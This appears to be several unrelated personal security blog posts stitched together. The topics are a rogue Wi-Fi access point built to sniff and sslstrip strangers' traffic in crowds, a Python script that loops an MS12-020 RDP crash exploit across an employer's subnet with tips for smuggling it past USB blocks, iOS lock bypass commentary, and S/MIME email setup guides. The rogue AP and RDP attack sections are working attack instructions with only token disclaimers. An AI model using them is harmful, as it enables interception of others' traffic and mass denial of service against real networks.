Equipment

1. an Alix board, CF, and enclosure
2. two ALPHA USB Wireless cards
3. a cell phone that you can tether to
4. mobile power solution

****  NOTES ****

I have written this very quickly and this may not be entirely accurate.  Although the tests that I have done did work this post has been put together using loose notes that I made through my testing.  I may (one day) return to this and tidy it up and add more detail, however I set out to do what I wanted and I wish to move on to newer projects.

Instructions

1.     To start build your Alix system.  I built mine with Debian and I found a GREAT tutorial on how to get it loaded on a CF for your Alix board here -> http://www.youtube.com/watch?v=6VPsgR4pMik  Install the most basic packages to to run the system, we will add the other stuff later.

2.     Once you have Debian installed on the CF and the board put together go ahead and start  it up.  Connect to the Alix board with a serial connection using 38400 baud, or 9600 if you didn’t change it in the last step.

3.     Log in to Debian using root and your password

4.     rm -f /etc/udev/rules.d/*_persistent-net.rules

5.     rm -f /etc/udev/rules.d/*_persistent-net-generator.rules

6.     reboot and connect the two USB WLAN cards

7.     Once the system is back up and running log in again with root

8.     install the following packages using the next command

9.     apt-get install wpasupplicant bridge-utils wireless-tools tcpdump ssh

10.    change the file /etc/network/interfaces to look like this (obviously use your wlan interfaces)

# Used by ifup(8) and ifdown(8). See the interfaces(5) manpage or
# /usr/share/doc/ifupdown/examples for more information.
auto lo
iface lo inet loopback
allow-hotplug eth0
iface eth0 inet dhcp
iface wlan1 inet dhcp
wpa-ssid "iPhone"
wpa-mode managed
wpa-conf /root/Rogue-Sniff/conf/iphone.conf
wpa-psk nodule5958

11.    Now we will need to install a bunch more stuff to get the necessary tools running

12.    apt-get install apt-get install build-essential libssl-dev subversion check install iw

13.    svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng

14.    Make, check install, and then run airodump-ng-oui-update

15.    Time to get the FakeAP up and running

16.    apt-get install dhcp3-server

17.    update-rc.d sic-dhcp-server remove

18.    cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak

19.    vi /etc/dhcp/dhcpd.conf and make it similar to this

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.1.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.1.2.255;
option routers 10.1.2.1;
option domain-name-servers 8.8.8.8;
range 10.1.2.100 10.1.2.150;
}

20.    airmon-ng start wlan0

21.    airbase-ng -e “ESSID” -c 9 mon0

22.    ifconfig at0 up

23.    ifconfig at0 10.1.2.1 netmask 255.255.255.0

24.    route add -net 10.1.2.0 netmask 255.255.255.0 gw 10.1.2.1

25.    dhcpd -cf /etc/dhcpd/dhcpd.conf -pf /var/run/dhcpd.pid at0

26.    Now you have an AP up and running for the sniffing but you know no one will use it unless you have it providing internet access

27.    Connect the Debian box to your cell phone (tethering) so that you can provide internet access to others on the go

28.    Create the file iPhone.conf and put the WPA/WPA2 settings in to tether to your phone

network={
ssid="iPhone"
key_mgmt=WPA-PSK
psk=(put your hex in here -> wpa_passphrase [SSID] [passphrase])
}

29.    Test out the connection by running the following

30.    wpa_supplicant -i wlan1 -B -c iphone.conf

31.    Get IP Tables running by creating the following script

#!/bin/sh
PATH=/usr/sbin:/sbin:/bin:/usr/bin
#
# delete all existing rules.
#
iptables -F
iptables -t nat -F
iptables -t mangle -F
iptables -X
# Always accept loopback traffic
iptables -A INPUT -i lo -j ACCEPT
# Allow established connections, and those not coming from the outside
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state NEW -j ACCEPT
iptables -A FORWARD -i wlan1 -o at0 -m state --state ESTABLISHED,RELATED -j ACCEPT
# Allow outgoing connections from the LAN side.
iptables -A FORWARD -i at0 -o wlan1 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp -i at0 --destination-port 80 -j REDIRECT --to-port 8080
# Masquerade.
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE
# Don't forward from the outside to the inside.
iptables -A FORWARD -i wlan1 -o wlan1 -j REJECT
# Enable routing.
echo 1 > /proc/sys/net/ipv4/ip_forward

32.    If that is all working for you create a bash script with the following (with values that will work for your network)

#! /bin/bash
# bring up the rogue and start sniffing
cd /
# change the mac to a Linksys AP
/usr/bin/macchanger --mac=00:06:25:3E:BD:93 wlan0
/usr/bin/macchanger -r wlan1
echo "connecting to phone"
/sbin/wpa_supplicant -i wlan1 -B -c /root/iphone.conf
sleep 45
echo "getting ip address"
/sbin/dhclient wlan1
/usr/local/sbin/airbase-ng --essid hotspot -c 11 wlan0 &
sleep 15
/sbin/ifconfig at0 10.1.1.2 netmask 255.255.255.0
/sbin/route add -net 10.1.1.0 netmask 255.255.255.0 gw 10.1.1.2
/sbin/ifconfig at0 up
sleep 5
/usr/sbin/dhcpd -cf /etc/dhcp/dhcpd.conf
./root/Rogue-Sniff/iptables.sh
tcpdump -i wlan1 -s 0 -e -vv -XX link[25] != 0x80 -w /root/Rogue-Sniff/capture

33.    Add a line to execute this script at startup with rc.local

34.    Now that your CF card is at a point where you want it pull it off the Alix board and DD it to another Linux box so that you will never have to go through all this again.

35.    Connect your portable power source and out the door you go!  I used two 9V batteries that do power the setup, but I highly doubt that it would last long.

Going Further

1.     When acting as an AP for people the main point here is to sniff traffic and record it.  What point would it be to record encrypted traffic?  Go a little further with this and throw SSL Strip into the mix!

2.     Very Useful Applications (if you have room on the CF)
python
python-twisted-web
kismet
nmap
telnet
fping
smbclient
curl
links
dnsutils
Tenable Nessus
Metasploit Framework

3.     The best places to take advantage of wireless networks is in highly populated areas that do not have hotspots.  Think of a convention or parade.  Some people really what to get on the net, and you could even highjack their broadcasts … say they are probing for “linksys” why not rename your SSID?

Photos of My Project

The intended goal could not be accomplished … Why? Android currently does not support smime! WTF? Now before anyone starts commenting that they were able to do this, remember what the goal was. There are apps out there for android that will support smime, but I wanted to use the “mail” app that came with my device.

This definitely is (in my mind) a huge failure for the android OS. Apple’s iOS has got them beat hands down on this one.

Symptoms

On a Windows 2003 (replicated as well on a 2008 R2 server) server or an XP client you get an error page from IE saying “Internet Explorer cannot display the webpage” but you know your internet connection is up and the server is up as well.  To double check that the server is actually up check the site on your phone, or another computer.

I also tried accessing this site from a CAIN Live CD and received a message from Epiphany Web Browser saying “Unable to load page.  Problem occurred while loading the URL https://somesite.com  SSL handshake failed: A TLS packet with unexpected length was received.

The FIX (for XP and 2003)

This is almost impossible to find but MS has a patch to fix this issue.  You have to ask nicely for it though.  Just go to http://support.microsoft.com/kb/968730 and read all about it.  Now why something like this not included in Windows Update?

I just ran into this today and was amazed that I haven’t heard of it until now. Published on February 5, 2012 “Ade Barkah” claims that he can get information from your address book, make phone calls, and even start a FaceTime call on a locked iPhone 4 with IOS 5. I had my doubts that this would still work, so I grabbed my iPhone 4 with IOS 5.1 and gave it a try.

The first thing that I noticed was that I still had voice dialing enabled. Holly Crap! **Thunk** should have had a V8! Well beside the fact that my phone wasn’t locked down all that good it did get me to turn off voice dialing. WHY Though?! Apple still has not fixed the exploits that were published in February! Read all about getting into the device (simply) when it is locked here. The article goes through step by step on getting information out of a locked iPhone 4, how to place calls, and even place a FaceTime call.

So this makes me start to think, what else has Apple ignored? What was the last thing like this I heard about? The iPad 2 “smart cover unlock”! For those of you that haven’t heard of this or tried it, it is really cool. What you do is take an iPad 2 and lock the screen. Then close the smart cover. Open the smart cover and hold the power button until you see the slide to shutdown screen. Close the smart cover, and then open it again. You still see the slide to shutdown screen. Tap “cancel” … WTF?! Yep, that’s right, your iPad2 is now unlocked.

Could this really still work? I gave ‘er a whirl on an iPad 3 and … Nope. Apple fixed this one. So how is it that a company would fix this issue (even though very old) that was posted on a similar blog, and ignore something from February when IOS 5.1 was still not released? Is this exploit hardware related? I was able to confirm that the exploits for the iPhone 4 did work, and they also worked on the iPhone 3GS. I would like to find out if it would actually work on an iPhone 4S I just have to get my hands on one first.

Now everyone knows how secretive Apple is when it comes to development, and security. Its fine, I actually think it is a huge reason that the company has such successful launches. I even watch the blogs when the keynote starts! But where do you draw the line between secrecy to protect your intellectual property, and letting your customers know when they may be at risk? This is something that troubles me. Who knows what zero days are out there for Mac OSX and IOS, that Apple and a few black hats know about? Ask yourself this now. How safe do you feel with all that information on your iPad, and iPhone … that may not be as safe as you think it is?

If you are new to MetaSploit or just want to learn more go to http://www.offensive-security.com/metasploit-unleashed/Main_Page and start learning for free. However if you can spare some cash they do take donations that go to HFC (Hackers For Charity).

So to start off you will need the PoC code that was posted on PasteBin.com I am not going to link to it but a quick Google search will give you what you need. Copy the RAW paste to a text file and save it as RDP_Exploit.py That really is all you need to do. If your computer at work has Python installed on it skip ahead. Most people will need the next few steps.

Download Portable Python and install it on your flash drive at home. This is real easy so I am not going to go indepth on this. But for the lazy people out there use these links.

http://www.portablepython.com/
http://www.portablepython.com/wiki/Download
http://www.portablepython.com/wiki/Documentation

OK so now here is how you take this nice little PoC that causes a BSOD to screw your work network right over! Again DO NOT DO THIS unless you are willing to accept the consequences, which is usually 1-Loose your job and 2-Legal proceedings. The aim here is to take down a complete subnet. Most admins leave TCP:3389 open and listening on all servers in the data center so that they can work. Rarely they go through the trouble of ensuring that only IT staff can connect on these ports. This is where it gets fun.

Figure out what subnet you wish to attack at work is. This can be done with a combination of tracert, ping, and nslookup. Shouldn’t be too hard to get this information. Hell if you can’t figure it out, just go after the biggest dog in the network, which is usually the Active Directory server. From a dos prompt type “ping [domain].[com, ca, local, whatever]” this will give you an ip. Use your smarts to figure out the subnet.

Create another text file and save it as RDP_Attack.py or download this and rename it. Now hopefully your attack subnet was a class C because this is how I wrote the file to work. If not feel free to change the python to work for you. Save the following text in the file. If you copy and paste from this page you will need to fix the python. Replace all the quotes with single quotes. Sorry but WordPress kind of sucks, but it is convenient.

#
# MS12-020 subnet attack with pastebin.com PoC
#
import os
import sys

NET = sys.argv[1]

for i in range(1,255):
     for j in range(1,16):
          print ‘Attacking ‘+NET+’.'+str(i)+’ attempt #’+str(j)
          print os.system(‘”portable python 2.7.2.1\App\python.exe” RDP_Exploit.py ‘+NET+’.'+str(i))

Now to get your payload ready. Get a USB thumb drive and copy the two python files that you saved to it. Your drive structure should be something like this

F:\RDP_Exploit.py
F:\RDP_Attack.py
F:\Portable Python 2.7.2.1
F:\Portable Python 2.7.2.1\[all the python files]

So what do you do if your company has prevented the use of USB drives. Just get creative. Think encrypted archive files through SFTP, FTPS, HTTP, HTTPS ... hell the list goes on. All you need to do is get all these files onto a local system in your target attack network.

Once you get these files onto the system inside the network (I am going to assume the USB flash worked on F: for my example) all you need to do is launch the attack on the subnet you identified earlier. REMEMBER THE SECOND PYTHON FILE WAS FOR A CLASS C NETWORK ONLY! Open a command promt and enter the following:

F:
"Portable Python 2.7.2.1\App\python.exe" RDP_Attack.py [your class c net]

When your class c net is entered above format it like 10.1.1 or 192.168.1 You may notice that you attack each system 15 times. I found that when running the actual exploit most times it would not work the first time that I executed it. This is why that happens if you were wondering. So if everything goes right (wrong for the admins) you have just taken down a crap load of servers!

There you go if there are un-patched servers that you can connect to on TCP:3389 you should take them all down. I will be the first to admit that this is very slow but it is just to illustrate the point. The python in RDP_Attack.py can be altered to make the attack very fast. This is only one way that a piece of PoC code that causes a BSOD can be used to wreak mass disruption. More of a DoS attack than anything else but if you are that certain disgruntle employee out there ...

**AGAIN IF YOU USE THIS MALICIOUSLY YOU WILL GET CAUGHT AND I AM NOT RESPONSIBLE**

Creating and Exporting Your Private and Public Key

1. Open Internet Explorer. DO NOT USE ANY OTHER BROWSER. I just couldn’t get this working in Chrome or Safari.

2. Go to http://www.comodo.com/home/email-security/free-email-certificate.php and click on “Download Now”.

3. Fill out the information on the page. You must fill this out with honest information or your signing/encryption may not work. Leave the key size at 2048 and click next.

4. When prompted let the browser perform the certificate tasks for you. When the certificate tasks are done do not close your browser (if you have multiple browsers).

5. Open your email and click the link to retrieve your certificate. If this page is not opened in IE then copy and paste the link into the Internet Explorer browser that you left open.

6. Again let the browser perform the certificate tasks to complete the installation.

7. To get the certificate on your IOS device you will need to export the public and private keys from IE. To do this click “tools”, then “internet options” from IE. In the new window that opened click the “content” tab.

8. Now click on the button labeled “Certificates”.

9. On The “Personal” tab in the new window that opened you should see a certificate with your email address as the “issued to”. click on this cert once, then click the “Export” button.

10. An MS wizard opens and click Next, Ensure you export the private key and click Next, Select PKCS #12 and “Include all Certificates in the certification path if possible”. If you are not going to use the cert on the desktop that you installed it on select the option to delete the private key. Now click next. Enter a STRONG password in the box (at least 15 charactors containing 3 of the 4 charactor sets). The need for a strong password is just good practice as well as you are probably going to send this through email. Click Next. Click Browse and give your file a name and select a place to save it. Click Next. Click Finish, and you should see a message letting you know the export was successfull. Again if you are not going to use this cert on the desktop you created it on delete the cert now from the Certificates window.

11. Close the windows that were opened in the previous steps.

Installing Your Private and Public Key in IOS

1. email yourself the certificate file you created in step 10.

2. On your IOS device open that email.

3. Tap on the PFX attachment

4. You will get a Certificate window after the prompt. In this window select Install.

5. Enter your IOS password (if you have one)

6. Now enter the password for the certificate file. This is the password you entered in the previous section.

7. You should now see something like this.

8. Select done and open your IOS setting from your main IOS screen.

9. Select “Mail, Contacts, Calendars”

10. Select your mail account that has the email address that matches the one you used for your certificate. And select the “Account” button to get more options and “Advanced”. Now change the S/MIME section from the first image to the second.

11. Select the Account button on the top left, then done in the top right, mail in the top left, and settings on the top left to finish off.

12. Your email will now be digitally signed when being sent from this account, and encrypted **ONLY when you have the recipient’s Public Key**

Installing Other People’s Public Key in IOS

1. When a trusted sender sends you a digitaly signed email (and you have S/MIME options turned on [you did this in the previous section]) you can install their public key and send encrypted email. When you have completed these steps you will send encrypted email but the recipient must do this as well to send you encrypted email. If they don’t you will receive un-encrypted email, but send them encrypted email.

2. Open the email from the trusted sender.

3. Select the “From” field and you will bring up their contact info. Select Install to install the sender’s public key.

4.Once this is done, and you have the S/MIME settings from the previous steps, you will by default send encrypted email to this user. When you send to other users you will notice that the address goes red and an open lock is displayed letting you know that the email is un-encrypted.

That answer has always been a port scanner and Metasploit. Most n00bs didn’t go any further because it was a command line and you actually had to know a little about what you were doing. Then Metasploit community came and the skiddies got a GUI. Still many don’t know how to use metasploit. Well the day has come. Can you teach me to hack? NO! but these guys will.

SecurityTube has released it’s courseware for their SMFE (SecurityTube Metasploit Framework Expert) certification. Yep, it is over 10 hours of you learning to “hack”. I use that term very loosly here … OK you don’t learn to hack but you get security basics, and you will understand how to use metasploit. That in its self will get you into a lot of computers out there. You probably wont be able to hack Google but you will have a shot at Sony or the FBI.

OK that last piece was a joke but it is funny!

Enroll and get extra perks here –> http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#enroll

Get the DVD for Free here –> http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#question

1. Start by setting your mail client to use POP3 and SMTP with SSL. This varies between mail clients and email providers. Check with your provider for details.

2. Get yourself a digital cert provided by a trusted CA … FOR FREE! Go to http://www.comodo.com/home/email-security/free-email-certificate.php and go through the easy to follow steps. Once you are done you will have yourself a personalized digital cert.

3. Tell all your friends, or at least the ones that you want to have encrypted email capabilities with to do the same thing.

4. Set your mail client to digitally sign your emails by default. This will send out your public key to your friends. Make sure that your friends send you theirs.

5. Now once you receive a digitally signed email you need to “install” that cert. Sometimes with mail clients it is automatic, sometimes not. With outlook make sure that the certificate is added to their contact card. Your friends will have to do the same thing with your public key (digital cert).

6. Now you will be able to send encrypted email between yourself and your friends.

Now let me point out couple of BIG points here. If you use a shared profile – you are hooped. If you don’t password protect your profile – you are hooped. Basically if your Certificate “Key Chain” is compromised/accessed in any way by anyone but you – you are hooped. The way to keep the emails sent to you encrypted and safe is to KEEP YOUR PRIVATE KEY PRIVATE! If you don’t do that, the encryption don’t mean Jack.

Go to http://www.en-lightn.com/?p=341 for detailed IOS information

Some additional help with Outlook, SSL, and Certs

http://support.microsoft.com/kb/287532
http://office.microsoft.com/en-us/outlook-help/about-digital-signatures-HP005249555.aspx
http://office.microsoft.com/en-us/outlook-help/send-a-digitally-signed-message-HP005242354.aspx
http://office.microsoft.com/en-us/outlook-help/verify-the-digital-signature-on-a-signed-message-you-receive-HP005242361.aspx
http://office.microsoft.com/en-us/outlook-help/encrypt-e-mail-messages-HP001230536.aspx?CTT=1